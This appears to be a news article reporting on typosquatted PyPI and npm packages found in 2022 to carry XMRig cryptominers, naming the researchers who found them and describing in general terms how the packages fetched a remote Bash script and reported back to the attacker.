Most of these packages are typosquats, resembling their names with that of popular PyPI or npm packages to get unsuspecting installs. While the operation seems to be down as of now, it’s still a growing threat to this community.
Typosquatting as the Major Technique
Despite having tighter security rules like a mandatory 2FA authentication for high-priority accounts, the JavaScript and Python package registries are still targeted with malicious attacks. The latest one is spotted by a security researcher named Hauke Lübbers, who shared that “at least 33 projects” on PyPI had XMRig – an open-source Monero cryptominer. These projects are mostly typosquats of other popular packages like React, argparse, and AIOHTTP, and carry cryptomininers in their scripts.
— Hauke Lübbers (@streamlin3d) August 17, 2022 He noticed that the threat actor was downloading a Bash cryptomininer script from a remote server via Bit.ly URL shortener, as seen below; Though this website is now down, Sonatype security researchers have found a copy of it hosting the malicious scripts. Also, they discovered 186 npm typosquatting packages through it! Aside from this, Hauke Lübbers found yet another bunch of 22 PyPI packages with the same malicious payload. When installed by unsuspecting developers, these scripts notify the threat actor of an IP address of the compromised host and the status of cryptomininer deployment. Overall, they have found more than 241 malicious npm and PyPI packages having cryptominers – all targeting Linux machines. While it’s still a growing threat to the developer community, the registries are good enough to act quickly by removing all the concerned packages right after informing them. Yet, developers depending on open-source scripts in PyPI and npm are advised to proceed with caution when installing something.